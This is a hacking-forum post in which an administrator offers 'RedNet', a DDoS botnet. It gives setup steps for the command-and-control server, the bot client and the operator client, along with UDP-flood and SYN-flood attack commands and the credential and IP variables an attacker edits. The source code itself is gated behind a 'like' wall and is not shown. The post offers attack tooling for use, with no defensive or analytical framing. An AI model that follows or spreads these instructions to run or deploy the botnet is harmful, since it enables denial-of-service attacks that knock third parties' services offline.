• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Botnet RedNet [DDos botnet]

Status
Not open for further replies.

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
32
Reaction score
45,552
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%
RedNet



A simple DDos botnet



Is under development




OS Supported


  • Windows
  • Linux (Kali Linux) (Other distributions probably will works)
  • Other operating systems have not tested


Usage



Install the dependencies


  • pip3 install -r requirements.txt or python3 -m pip install -r requirements


Server: Accepts connections and redirects commands to bots


  • python3 server.py (It depends on the server_modules) (python3)


Client: Connects to the server, waits for commands, and executes them.


  • python client.py (It depends on the client_modules) (python2)


root_cient: Connects to the server, and allows you to send commands to the bots.


  • python root_client.py --host IP --port PORT (python2)


Commands


  • !bots Returns the number of bots actives.
  • !udpflood.start IP:PORT Starts UDP Flood DDos Attack
  • !synflood.start IP:PORT:PACKAGES_COUNT Starts SYN Flood DDos Attack (PACKAGES_COUNT is optional)


Variables to modify


  • user_required and pass_required on server.py (It is the username and password that the attacker will use to control the bots.)
  • user and password on root_client.py (Is the username and password that will be sent when connecting)
  • IP and PORT (On server.py and client.py)

To see this hidden content, you must like this content.


 
Status
Not open for further replies.
Back
Top